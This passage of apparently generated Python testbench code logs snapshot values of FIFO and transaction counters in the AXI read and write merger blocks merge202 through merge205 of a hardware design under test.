logs.log_info("SNP %x tb.dut.merge202.axi_wr_4_merger.b_bcount" % logs.peek("tb.dut.merge202.axi_wr_4_merger.b_bcount"))
logs.log_info("SNP %x tb.dut.merge202.axi_wr_4_merger.c_bcount" % logs.peek("tb.dut.merge202.axi_wr_4_merger.c_bcount"))
logs.log_info("SNP %x tb.dut.merge202.axi_wr_4_merger.d_bcount" % logs.peek("tb.dut.merge202.axi_wr_4_merger.d_bcount"))
logs.log_info("SNP %x tb.dut.merge202.axi_wr_4_merger.a_aw_fifo.count" % logs.peek("tb.dut.merge202.axi_wr_4_merger.a_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge202.axi_wr_4_merger.a_aw_fifo.int_count" % logs.peek("tb.dut.merge202.axi_wr_4_merger.a_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge202.axi_wr_4_merger.a_b_fifo.next_count" % logs.peek("tb.dut.merge202.axi_wr_4_merger.a_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge202.axi_wr_4_merger.a_b_fifo.count" % logs.peek("tb.dut.merge202.axi_wr_4_merger.a_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge202.axi_wr_4_merger.a_win_fifo.count" % logs.peek("tb.dut.merge202.axi_wr_4_merger.a_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge202.axi_wr_4_merger.a_win_fifo.int_count" % logs.peek("tb.dut.merge202.axi_wr_4_merger.a_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge202.axi_wr_4_merger.b_aw_fifo.count" % logs.peek("tb.dut.merge202.axi_wr_4_merger.b_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge202.axi_wr_4_merger.b_aw_fifo.int_count" % logs.peek("tb.dut.merge202.axi_wr_4_merger.b_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge202.axi_wr_4_merger.b_b_fifo.next_count" % logs.peek("tb.dut.merge202.axi_wr_4_merger.b_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge202.axi_wr_4_merger.b_b_fifo.count" % logs.peek("tb.dut.merge202.axi_wr_4_merger.b_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge202.axi_wr_4_merger.b_out_fifo.next_count" % logs.peek("tb.dut.merge202.axi_wr_4_merger.b_out_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge202.axi_wr_4_merger.b_out_fifo.count" % logs.peek("tb.dut.merge202.axi_wr_4_merger.b_out_fifo.count"))
logs.log_info("SNP %x tb.dut.merge202.axi_wr_4_merger.b_win_fifo.count" % logs.peek("tb.dut.merge202.axi_wr_4_merger.b_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge202.axi_wr_4_merger.b_win_fifo.int_count" % logs.peek("tb.dut.merge202.axi_wr_4_merger.b_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge202.axi_wr_4_merger.c_aw_fifo.count" % logs.peek("tb.dut.merge202.axi_wr_4_merger.c_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge202.axi_wr_4_merger.c_aw_fifo.int_count" % logs.peek("tb.dut.merge202.axi_wr_4_merger.c_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge202.axi_wr_4_merger.c_b_fifo.next_count" % logs.peek("tb.dut.merge202.axi_wr_4_merger.c_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge202.axi_wr_4_merger.c_b_fifo.count" % logs.peek("tb.dut.merge202.axi_wr_4_merger.c_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge202.axi_wr_4_merger.c_win_fifo.count" % logs.peek("tb.dut.merge202.axi_wr_4_merger.c_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge202.axi_wr_4_merger.c_win_fifo.int_count" % logs.peek("tb.dut.merge202.axi_wr_4_merger.c_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge202.axi_wr_4_merger.d_aw_fifo.count" % logs.peek("tb.dut.merge202.axi_wr_4_merger.d_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge202.axi_wr_4_merger.d_aw_fifo.int_count" % logs.peek("tb.dut.merge202.axi_wr_4_merger.d_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge202.axi_wr_4_merger.d_b_fifo.next_count" % logs.peek("tb.dut.merge202.axi_wr_4_merger.d_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge202.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge202.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge202.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge202.axi_wr_4_merger.d_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge202.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge202.axi_wr_4_merger.d_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge203.axi_rd_4_merger.a_rcount" % logs.peek("tb.dut.merge203.axi_rd_4_merger.a_rcount"))
logs.log_info("SNP %x tb.dut.merge203.axi_rd_4_merger.b_rcount" % logs.peek("tb.dut.merge203.axi_rd_4_merger.b_rcount"))
logs.log_info("SNP %x tb.dut.merge203.axi_rd_4_merger.c_rcount" % logs.peek("tb.dut.merge203.axi_rd_4_merger.c_rcount"))
logs.log_info("SNP %x tb.dut.merge203.axi_rd_4_merger.d_rcount" % logs.peek("tb.dut.merge203.axi_rd_4_merger.d_rcount"))
logs.log_info("SNP %x tb.dut.merge203.axi_rd_4_merger.a_ar_fifo.count" % logs.peek("tb.dut.merge203.axi_rd_4_merger.a_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge203.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge203.axi_rd_4_merger.a_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge203.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge203.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge203.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge203.axi_rd_4_merger.a_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge203.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge203.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge203.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge203.axi_rd_4_merger.b_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge203.axi_rd_4_merger.b_ids_fifo.next_count" % logs.peek("tb.dut.merge203.axi_rd_4_merger.b_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge203.axi_rd_4_merger.b_ids_fifo.count" % logs.peek("tb.dut.merge203.axi_rd_4_merger.b_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge203.axi_rd_4_merger.c_ar_fifo.count" % logs.peek("tb.dut.merge203.axi_rd_4_merger.c_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge203.axi_rd_4_merger.c_ar_fifo.int_count" % logs.peek("tb.dut.merge203.axi_rd_4_merger.c_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge203.axi_rd_4_merger.c_ids_fifo.next_count" % logs.peek("tb.dut.merge203.axi_rd_4_merger.c_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge203.axi_rd_4_merger.c_ids_fifo.count" % logs.peek("tb.dut.merge203.axi_rd_4_merger.c_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge203.axi_rd_4_merger.d_ar_fifo.count" % logs.peek("tb.dut.merge203.axi_rd_4_merger.d_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge203.axi_rd_4_merger.d_ar_fifo.int_count" % logs.peek("tb.dut.merge203.axi_rd_4_merger.d_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge203.axi_rd_4_merger.d_ids_fifo.next_count" % logs.peek("tb.dut.merge203.axi_rd_4_merger.d_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge203.axi_rd_4_merger.d_ids_fifo.count" % logs.peek("tb.dut.merge203.axi_rd_4_merger.d_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge203.axi_wr_4_merger.panic_acount" % logs.peek("tb.dut.merge203.axi_wr_4_merger.panic_acount"))
logs.log_info("SNP %x tb.dut.merge203.axi_wr_4_merger.panic_bcount" % logs.peek("tb.dut.merge203.axi_wr_4_merger.panic_bcount"))
logs.log_info("SNP %x tb.dut.merge203.axi_wr_4_merger.panic_ccount" % logs.peek("tb.dut.merge203.axi_wr_4_merger.panic_ccount"))
logs.log_info("SNP %x tb.dut.merge203.axi_wr_4_merger.panic_dcount" % logs.peek("tb.dut.merge203.axi_wr_4_merger.panic_dcount"))
logs.log_info("SNP %x tb.dut.merge203.axi_wr_4_merger.a_bcount" % logs.peek("tb.dut.merge203.axi_wr_4_merger.a_bcount"))
logs.log_info("SNP %x tb.dut.merge203.axi_wr_4_merger.b_bcount" % logs.peek("tb.dut.merge203.axi_wr_4_merger.b_bcount"))
logs.log_info("SNP %x tb.dut.merge203.axi_wr_4_merger.c_bcount" % logs.peek("tb.dut.merge203.axi_wr_4_merger.c_bcount"))
logs.log_info("SNP %x tb.dut.merge203.axi_wr_4_merger.d_bcount" % logs.peek("tb.dut.merge203.axi_wr_4_merger.d_bcount"))
logs.log_info("SNP %x tb.dut.merge203.axi_wr_4_merger.a_aw_fifo.count" % logs.peek("tb.dut.merge203.axi_wr_4_merger.a_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge203.axi_wr_4_merger.a_aw_fifo.int_count" % logs.peek("tb.dut.merge203.axi_wr_4_merger.a_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge203.axi_wr_4_merger.a_b_fifo.next_count" % logs.peek("tb.dut.merge203.axi_wr_4_merger.a_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge203.axi_wr_4_merger.a_b_fifo.count" % logs.peek("tb.dut.merge203.axi_wr_4_merger.a_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge203.axi_wr_4_merger.a_win_fifo.count" % logs.peek("tb.dut.merge203.axi_wr_4_merger.a_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge203.axi_wr_4_merger.a_win_fifo.int_count" % logs.peek("tb.dut.merge203.axi_wr_4_merger.a_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge203.axi_wr_4_merger.b_aw_fifo.count" % logs.peek("tb.dut.merge203.axi_wr_4_merger.b_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge203.axi_wr_4_merger.b_aw_fifo.int_count" % logs.peek("tb.dut.merge203.axi_wr_4_merger.b_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge203.axi_wr_4_merger.b_b_fifo.next_count" % logs.peek("tb.dut.merge203.axi_wr_4_merger.b_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge203.axi_wr_4_merger.b_b_fifo.count" % logs.peek("tb.dut.merge203.axi_wr_4_merger.b_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge203.axi_wr_4_merger.b_out_fifo.next_count" % logs.peek("tb.dut.merge203.axi_wr_4_merger.b_out_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge203.axi_wr_4_merger.b_out_fifo.count" % logs.peek("tb.dut.merge203.axi_wr_4_merger.b_out_fifo.count"))
logs.log_info("SNP %x tb.dut.merge203.axi_wr_4_merger.b_win_fifo.count" % logs.peek("tb.dut.merge203.axi_wr_4_merger.b_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge203.axi_wr_4_merger.b_win_fifo.int_count" % logs.peek("tb.dut.merge203.axi_wr_4_merger.b_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge203.axi_wr_4_merger.c_aw_fifo.count" % logs.peek("tb.dut.merge203.axi_wr_4_merger.c_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge203.axi_wr_4_merger.c_aw_fifo.int_count" % logs.peek("tb.dut.merge203.axi_wr_4_merger.c_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge203.axi_wr_4_merger.c_b_fifo.next_count" % logs.peek("tb.dut.merge203.axi_wr_4_merger.c_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge203.axi_wr_4_merger.c_b_fifo.count" % logs.peek("tb.dut.merge203.axi_wr_4_merger.c_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge203.axi_wr_4_merger.c_win_fifo.count" % logs.peek("tb.dut.merge203.axi_wr_4_merger.c_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge203.axi_wr_4_merger.c_win_fifo.int_count" % logs.peek("tb.dut.merge203.axi_wr_4_merger.c_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge203.axi_wr_4_merger.d_aw_fifo.count" % logs.peek("tb.dut.merge203.axi_wr_4_merger.d_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge203.axi_wr_4_merger.d_aw_fifo.int_count" % logs.peek("tb.dut.merge203.axi_wr_4_merger.d_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge203.axi_wr_4_merger.d_b_fifo.next_count" % logs.peek("tb.dut.merge203.axi_wr_4_merger.d_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge203.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge203.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge203.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge203.axi_wr_4_merger.d_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge203.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge203.axi_wr_4_merger.d_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge204.axi_rd_4_merger.a_rcount" % logs.peek("tb.dut.merge204.axi_rd_4_merger.a_rcount"))
logs.log_info("SNP %x tb.dut.merge204.axi_rd_4_merger.b_rcount" % logs.peek("tb.dut.merge204.axi_rd_4_merger.b_rcount"))
logs.log_info("SNP %x tb.dut.merge204.axi_rd_4_merger.c_rcount" % logs.peek("tb.dut.merge204.axi_rd_4_merger.c_rcount"))
logs.log_info("SNP %x tb.dut.merge204.axi_rd_4_merger.d_rcount" % logs.peek("tb.dut.merge204.axi_rd_4_merger.d_rcount"))
logs.log_info("SNP %x tb.dut.merge204.axi_rd_4_merger.a_ar_fifo.count" % logs.peek("tb.dut.merge204.axi_rd_4_merger.a_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge204.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge204.axi_rd_4_merger.a_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge204.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge204.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge204.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge204.axi_rd_4_merger.a_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge204.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge204.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge204.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge204.axi_rd_4_merger.b_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge204.axi_rd_4_merger.b_ids_fifo.next_count" % logs.peek("tb.dut.merge204.axi_rd_4_merger.b_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge204.axi_rd_4_merger.b_ids_fifo.count" % logs.peek("tb.dut.merge204.axi_rd_4_merger.b_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge204.axi_rd_4_merger.c_ar_fifo.count" % logs.peek("tb.dut.merge204.axi_rd_4_merger.c_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge204.axi_rd_4_merger.c_ar_fifo.int_count" % logs.peek("tb.dut.merge204.axi_rd_4_merger.c_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge204.axi_rd_4_merger.c_ids_fifo.next_count" % logs.peek("tb.dut.merge204.axi_rd_4_merger.c_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge204.axi_rd_4_merger.c_ids_fifo.count" % logs.peek("tb.dut.merge204.axi_rd_4_merger.c_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge204.axi_rd_4_merger.d_ar_fifo.count" % logs.peek("tb.dut.merge204.axi_rd_4_merger.d_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge204.axi_rd_4_merger.d_ar_fifo.int_count" % logs.peek("tb.dut.merge204.axi_rd_4_merger.d_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge204.axi_rd_4_merger.d_ids_fifo.next_count" % logs.peek("tb.dut.merge204.axi_rd_4_merger.d_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge204.axi_rd_4_merger.d_ids_fifo.count" % logs.peek("tb.dut.merge204.axi_rd_4_merger.d_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge204.axi_wr_4_merger.panic_acount" % logs.peek("tb.dut.merge204.axi_wr_4_merger.panic_acount"))
logs.log_info("SNP %x tb.dut.merge204.axi_wr_4_merger.panic_bcount" % logs.peek("tb.dut.merge204.axi_wr_4_merger.panic_bcount"))
logs.log_info("SNP %x tb.dut.merge204.axi_wr_4_merger.panic_ccount" % logs.peek("tb.dut.merge204.axi_wr_4_merger.panic_ccount"))
logs.log_info("SNP %x tb.dut.merge204.axi_wr_4_merger.panic_dcount" % logs.peek("tb.dut.merge204.axi_wr_4_merger.panic_dcount"))
logs.log_info("SNP %x tb.dut.merge204.axi_wr_4_merger.a_bcount" % logs.peek("tb.dut.merge204.axi_wr_4_merger.a_bcount"))
logs.log_info("SNP %x tb.dut.merge204.axi_wr_4_merger.b_bcount" % logs.peek("tb.dut.merge204.axi_wr_4_merger.b_bcount"))
logs.log_info("SNP %x tb.dut.merge204.axi_wr_4_merger.c_bcount" % logs.peek("tb.dut.merge204.axi_wr_4_merger.c_bcount"))
logs.log_info("SNP %x tb.dut.merge204.axi_wr_4_merger.d_bcount" % logs.peek("tb.dut.merge204.axi_wr_4_merger.d_bcount"))
logs.log_info("SNP %x tb.dut.merge204.axi_wr_4_merger.a_aw_fifo.count" % logs.peek("tb.dut.merge204.axi_wr_4_merger.a_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge204.axi_wr_4_merger.a_aw_fifo.int_count" % logs.peek("tb.dut.merge204.axi_wr_4_merger.a_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge204.axi_wr_4_merger.a_b_fifo.next_count" % logs.peek("tb.dut.merge204.axi_wr_4_merger.a_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge204.axi_wr_4_merger.a_b_fifo.count" % logs.peek("tb.dut.merge204.axi_wr_4_merger.a_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge204.axi_wr_4_merger.a_win_fifo.count" % logs.peek("tb.dut.merge204.axi_wr_4_merger.a_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge204.axi_wr_4_merger.a_win_fifo.int_count" % logs.peek("tb.dut.merge204.axi_wr_4_merger.a_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge204.axi_wr_4_merger.b_aw_fifo.count" % logs.peek("tb.dut.merge204.axi_wr_4_merger.b_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge204.axi_wr_4_merger.b_aw_fifo.int_count" % logs.peek("tb.dut.merge204.axi_wr_4_merger.b_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge204.axi_wr_4_merger.b_b_fifo.next_count" % logs.peek("tb.dut.merge204.axi_wr_4_merger.b_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge204.axi_wr_4_merger.b_b_fifo.count" % logs.peek("tb.dut.merge204.axi_wr_4_merger.b_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge204.axi_wr_4_merger.b_out_fifo.next_count" % logs.peek("tb.dut.merge204.axi_wr_4_merger.b_out_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge204.axi_wr_4_merger.b_out_fifo.count" % logs.peek("tb.dut.merge204.axi_wr_4_merger.b_out_fifo.count"))
logs.log_info("SNP %x tb.dut.merge204.axi_wr_4_merger.b_win_fifo.count" % logs.peek("tb.dut.merge204.axi_wr_4_merger.b_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge204.axi_wr_4_merger.b_win_fifo.int_count" % logs.peek("tb.dut.merge204.axi_wr_4_merger.b_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge204.axi_wr_4_merger.c_aw_fifo.count" % logs.peek("tb.dut.merge204.axi_wr_4_merger.c_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge204.axi_wr_4_merger.c_aw_fifo.int_count" % logs.peek("tb.dut.merge204.axi_wr_4_merger.c_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge204.axi_wr_4_merger.c_b_fifo.next_count" % logs.peek("tb.dut.merge204.axi_wr_4_merger.c_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge204.axi_wr_4_merger.c_b_fifo.count" % logs.peek("tb.dut.merge204.axi_wr_4_merger.c_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge204.axi_wr_4_merger.c_win_fifo.count" % logs.peek("tb.dut.merge204.axi_wr_4_merger.c_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge204.axi_wr_4_merger.c_win_fifo.int_count" % logs.peek("tb.dut.merge204.axi_wr_4_merger.c_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge204.axi_wr_4_merger.d_aw_fifo.count" % logs.peek("tb.dut.merge204.axi_wr_4_merger.d_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge204.axi_wr_4_merger.d_aw_fifo.int_count" % logs.peek("tb.dut.merge204.axi_wr_4_merger.d_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge204.axi_wr_4_merger.d_b_fifo.next_count" % logs.peek("tb.dut.merge204.axi_wr_4_merger.d_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge204.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge204.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge204.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge204.axi_wr_4_merger.d_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge204.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge204.axi_wr_4_merger.d_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge205.axi_rd_4_merger.a_rcount" % logs.peek("tb.dut.merge205.axi_rd_4_merger.a_rcount"))
logs.log_info("SNP %x tb.dut.merge205.axi_rd_4_merger.b_rcount" % logs.peek("tb.dut.merge205.axi_rd_4_merger.b_rcount"))
logs.log_info("SNP %x tb.dut.merge205.axi_rd_4_merger.c_rcount" % logs.peek("tb.dut.merge205.axi_rd_4_merger.c_rcount"))
logs.log_info("SNP %x tb.dut.merge205.axi_rd_4_merger.d_rcount" % logs.peek("tb.dut.merge205.axi_rd_4_merger.d_rcount"))
logs.log_info("SNP %x tb.dut.merge205.axi_rd_4_merger.a_ar_fifo.count" % logs.peek("tb.dut.merge205.axi_rd_4_merger.a_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge205.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge205.axi_rd_4_merger.a_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge205.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge205.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge205.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge205.axi_rd_4_merger.a_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge205.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge205.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge205.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge205.axi_rd_4_merger.b_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge205.axi_rd_4_merger.b_ids_fifo.next_count" % logs.peek("tb.dut.merge205.axi_rd_4_merger.b_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge205.axi_rd_4_merger.b_ids_fifo.count" % logs.peek("tb.dut.merge205.axi_rd_4_merger.b_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge205.axi_rd_4_merger.c_ar_fifo.count" % logs.peek("tb.dut.merge205.axi_rd_4_merger.c_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge205.axi_rd_4_merger.c_ar_fifo.int_count" % logs.peek("tb.dut.merge205.axi_rd_4_merger.c_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge205.axi_rd_4_merger.c_ids_fifo.next_count" % logs.peek("tb.dut.merge205.axi_rd_4_merger.c_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge205.axi_rd_4_merger.c_ids_fifo.count" % logs.peek("tb.dut.merge205.axi_rd_4_merger.c_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge205.axi_rd_4_merger.d_ar_fifo.count" % logs.peek("tb.dut.merge205.axi_rd_4_merger.d_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge205.axi_rd_4_merger.d_ar_fifo.int_count" % logs.peek("tb.dut.merge205.axi_rd_4_merger.d_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge205.axi_rd_4_merger.d_ids_fifo.next_count" % logs.peek("tb.dut.merge205.axi_rd_4_merger.d_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge205.axi_rd_4_merger.d_ids_fifo.count" % logs.peek("tb.dut.merge205.axi_rd_4_merger.d_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge205.axi_wr_4_merger.panic_acount" % logs.peek("tb.dut.merge205.axi_wr_4_merger.panic_acount"))
logs.log_info("SNP %x tb.dut.merge205.axi_wr_4_merger.panic_bcount" % logs.peek("tb.dut.merge205.axi_wr_4_merger.panic_bcount"))
logs.log_info("SNP %x tb.dut.merge205.axi_wr_4_merger.panic_ccount" % logs.peek("tb.dut.merge205.axi_wr_4_merger.panic_ccount"))
logs.log_info("SNP %x tb.dut.merge205.axi_wr_4_merger.panic_dcount" % logs.peek("tb.dut.merge205.axi_wr_4_merger.panic_dcount"))
logs.log_info("SNP %x tb.dut.merge205.axi_wr_4_merger.a_bcount" % logs.peek("tb.dut.merge205.axi_wr_4_merger.a_bcount"))
logs.log_info("SNP %x tb.dut.merge205.axi_wr_4_merger.b_bcount" % logs.peek("tb.dut.merge205.axi_wr_4_merger.b_bcount"))
logs.log_info("SNP %x tb.dut.merge205.axi_wr_4_merger.c_bcount" % logs.peek("tb.dut.merge205.axi_wr_4_merger.c_bcount"))
logs.log_info("SNP %x tb.dut.merge205.axi_wr_4_merger.d_bcount" % logs.peek("tb.dut.merge205.axi_wr_4_merger.d_bcount"))
logs.log_info("SNP %x tb.dut.merge205.axi_wr_4_merger.a_aw_fifo.count" % logs.peek("tb.dut.merge205.axi_wr_4_merger.a_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge205.axi_wr_4_merger.a_aw_fifo.int_count" % logs.peek("tb.dut.merge205.axi_wr_4_merger.a_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge205.axi_wr_4_merger.a_b_fifo.next_count" % logs.peek("tb.dut.merge205.axi_wr_4_merger.a_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge205.axi_wr_4_merger.a_b_fifo.count" % logs.peek("tb.dut.merge205.axi_wr_4_merger.a_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge205.axi_wr_4_merger.a_win_fifo.count" % logs.peek("tb.dut.merge205.axi_wr_4_merger.a_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge205.axi_wr_4_merger.a_win_fifo.int_count" % logs.peek("tb.dut.merge205.axi_wr_4_merger.a_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge205.axi_wr_4_merger.b_aw_fifo.count" % logs.peek("tb.dut.merge205.axi_wr_4_merger.b_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge205.axi_wr_4_merger.b_aw_fifo.int_count" % logs.peek("tb.dut.merge205.axi_wr_4_merger.b_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge205.axi_wr_4_merger.b_b_fifo.next_count" % logs.peek("tb.dut.merge205.axi_wr_4_merger.b_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge205.axi_wr_4_merger.b_b_fifo.count" % logs.peek("tb.dut.merge205.axi_wr_4_merger.b_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge205.axi_wr_4_merger.b_out_fifo.next_count" % logs.peek("tb.dut.merge205.axi_wr_4_merger.b_out_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge205.axi_wr_4_merger.b_out_fifo.count" % logs.peek("tb.dut.merge205.axi_wr_4_merger.b_out_fifo.count"))
logs.log_info("SNP %x tb.dut.merge205.axi_wr_4_merger.b_win_fifo.count" % logs.peek("tb.dut.merge205.axi_wr_4_merger.b_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge205.axi_wr_4_merger.b_win_fifo.int_count" % logs.peek("tb.dut.merge205.axi_wr_4_merger.b_win_fifo.int_count"))
